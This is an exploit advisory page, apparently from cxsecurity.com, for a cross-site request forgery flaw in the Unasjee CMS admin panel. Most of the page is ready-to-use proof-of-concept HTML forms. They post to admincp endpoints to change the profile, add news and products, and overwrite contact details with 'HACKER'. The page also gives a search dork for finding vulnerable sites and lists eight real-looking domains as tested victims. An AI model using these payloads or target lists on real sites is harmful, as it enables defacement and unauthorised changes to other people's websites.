Unasjee CMS Cross Site Request Forgery

2015.03.25
Credit: KnocKout
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

.__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ UNASJEE CMS -> Admin Panel CSRF Vulnerability PoC Exploits ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Discovered by: KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com ############################################################ Greetz: KedAns-Dz & DaiMon & _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu http://milw00rm.com / http://fiXen.org ############################################################ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : UNASJEE CMS |~Affected Version : All Version |~Vendor : http://www.unasjee.net/ |~DORK : intext:Designed & Developed by: UNASJEE |~RISK : High |~Date: 22.03.2015 |~Tested On : [L] Kali Linux ####################INFO################################ admin panel without login It is possible to post data the server will accept absolute. ######################################################## Demo and Tested on; http://turnnersports.com http://www.badhawaind.com http://www.cliftonintl.com http://www.aqnaf.com http://shanisports.com http://tayyabgarments.com http://www.shreentrader.com http://www.moosaleathers.com ---------------------------------------------------------- ---------------------------------------------------------- Change Profile Detai PoC ---------------------------------------------------------- <!-- Change Profile Detail --> <body> <form action="http://[TARGET]/admincp/updprofile.php" method="POST"> <input type="hidden" name="pfid" value="1" /> <input type="hidden" name="sFullDescription" value="HACKERRRRRRR" /> <input type="hidden" name="p1" value="HACKERRRRRRR" /> <input type="hidden" name="Submit" value="Submit" /> <input type="submit" value="Submit request" /> </form> </body> </html> ---------------------------------------------------------- Add News PoC ---------------------------------------------------------- <form name="frmnews" method="post" action="http://[TARGET]/admincp/addnews.php" onSubmit="return checknForm();"> <tr> <td valign="top" bgcolor="E8EEF3"><strong>&nbsp;&nbsp;Title: </strong><span class="error">*</span> </td> <td valign="top" bgcolor="E8EEF3"> <input name="ntitle" type="text" class="txtdefault" id="ntitle"> </td> </tr> <tr> <td valign="top" bgcolor="E8EEF3"><strong>&nbsp;&nbsp;Date:&nbsp;</strong><span class="error">*</span></td> <td valign="top" bgcolor="E8EEF3"> <input name="nDate" type="text" class="txtdefault" id="nDate"> &nbsp;(YYYY-MM-DD)</td> </tr> <tr> <td width="25%" valign="top" bgcolor="E8EEF3"><strong>&nbsp;&nbsp;News:<span class="error">&nbsp;</span></strong><span class="error">*</span></td> <td width="75%" valign="top" bgcolor="E8EEF3"> <textarea name="news" cols="30" rows="5" class="txtnews1" id="textarea"></textarea></td> </tr> <tr> <td bgcolor="E8EEF3">&nbsp;</td> <td bgcolor="E8EEF3"><input type="image" src="img/add_news.jpg" width="77" height="24"></td> </tr> </form> </table></td> </tr> </table></td> </tr> <tr> <td align="center"><img src="imgs/spacer.GIF" width="1" height="30"></td> </tr> </table></td> </tr> </table></td> </tr> <tr> ---------------------------------------------------------- Add Products PoC ---------------------------------------------------------- <td valign="top"><table width="450" border="0" cellpadding="1" cellspacing="2"> <form action="http://[TARGET]/admincp/addmainsection.php" enctype="multipart/form-data" method="post" name="frmnews" onSubmit="return checkmsecForm();"> <tr> <td width="29%" valign="top" bgcolor="E8EEF3">&nbsp;&nbsp;<strong>Name:</strong></td> <td width="71%" valign="top" bgcolor="E8EEF3"><input name="SecName" type="text" class="txtdefault" id="SecName"> &nbsp;<font color="#FF0000">*</font></td> </tr> <tr> <td bgcolor="E8EEF3">&nbsp;&nbsp;<strong>Show:</strong></td> <td bgcolor="E8EEF3"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="6%"><input name="show" type="radio" value="y" checked></td> <td width="13%">Yes</td> <td width="5%"><input type="radio" name="show" value="n"></td> <td width="76%">No</td> </tr> </table></td> </tr> <tr> <td bgcolor="E8EEF3">&nbsp;<strong>&nbsp;Category Image:</strong></td> <td bgcolor="E8EEF3"><input name="bFile" type="file" class="txtfilefield1" id="bFile"> &nbsp;70 x 62 px</td> </tr> <tr> <td bgcolor="E8EEF3">&nbsp;</td> <td bgcolor="E8EEF3"><input type="image" src="img/addmain_section.jpg" width="121" height="24"></td> </tr> </form> </table></td> </tr> </table></td> </tr> <tr> ---------------------------------------------------------- Change Contact Details PoC ---------------------------------------------------------- <form name="form1" method="post" action="http://[TARGET]/admincp/updcontact.php" > <input type="hidden" name="cid" value="1"> <table align=center width=525> <tr style="background-color:#B0B0B0; font-family:verdana; font-size:11; font-weight:bold; color:white"> <td height="25" colspan=3><div align="center">Change your Contact Detail:</div></td> </tr> <tr> <td width="35%">&nbsp;</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> &nbsp;First Contact Person:</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"> <input name=cp1 type=text id="cp1" value="HACKER"></td> <td width="16">&nbsp;</td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"> <input name=cpd1 type=text id="cpd1" value="HACKER"></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"> <input name=cpm1 type=text id="cpm1" value="HACKER"></td> <td>&nbsp;</td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> &nbsp;Second Contact Person:</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"> <input name=cp2 type=text id="cp2" value=""></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"> <input name=cpd2 type=text id="cpd2" value=""></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"> <input name=cpm2 type=text id="cpm2" value=""></td> <td>&nbsp;</td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC">&nbsp;Third Contact Person:</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"> <input name=cp3 type=text id="cp3" value=""></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"> <input name=cpd3 type=text id="cpd3" value=""></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"> <input name=cpm3 type=text id="cpm3" value=""></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">&nbsp;</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Phone I:</td> <td width="75%"> <input name=ph1 type=text id="ph1" value="HACKER"></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Phone II:</td> <td width="75%"> <input name=ph2 type=text id="ph2" value=""></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Phone III:</td> <td width="75%"> <input name=ph3 type=text id="ph3" value=""></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">&nbsp;</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Fax I:</td> <td width="75%"> <input name=fax1 type=text id="fax1" value="HACKER"></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">&nbsp;</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td width="35%">E - Mail I:</td> <td width="75%"> <input name=email1 type=text id="email1" value="HACKER"></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">E - Mail II:</td> <td width="75%"> <input name=email2 type=text id="email2" value=""></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">E - Mail II:</td> <td width="75%"> <input name=email3 type=text id="email3" value=""></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">&nbsp;</td> <td width="75%">&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td width="35%">Web Site:</td> <td width="75%"> <input name=web type=text id="web" value="HACKER"></td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>Skype:</td> <td><input name=skype type=text id="skype" value=""></td> <td>&nbsp;</td> </tr> <tr> <td>Yahoo:</td> <td><input name=yahoo type=text id="yahoo" value=""></td> <td>&nbsp;</td> </tr> <tr> <td>gTalk:</td> <td><input name=gtalk type=text id="gtalk" value=""></td> <td>&nbsp;</td> </tr> <tr> <td>MSN:</td> <td><input name=msn type=text id="msn" value=""></td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td width="35%"><div><strong>Asia Head Office&nbsp;Address:</strong></div> <br></td> <td width="75%"> <textarea name=haddress cols=38 rows=4 id="haddress" >HACKER</textarea></td> <td>&nbsp;</td> </tr> <tr> <td width="35%"><strong>Hong Kong Office&nbsp;Address:</strong> </td> <td width="75%"> <textarea name=faddress cols=38 rows=4 id="faddress" ></textarea></td> <td>&nbsp;</td> </tr> <tr> <td><strong>Australian&nbsp;Office&nbsp;Address:</strong></td> <td><textarea name=fax2 cols=38 rows=4 id="fax2" ></textarea></td> <td>&nbsp;</td> </tr> <tr> <td width="35%">&nbsp;</td> <td width="75%"> <input type="submit" name="Submit" value="Submit"> <input name="reset" type="reset" id="reset" value="Reset"></td> <td>&nbsp;</td> </tr> </table> </form>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top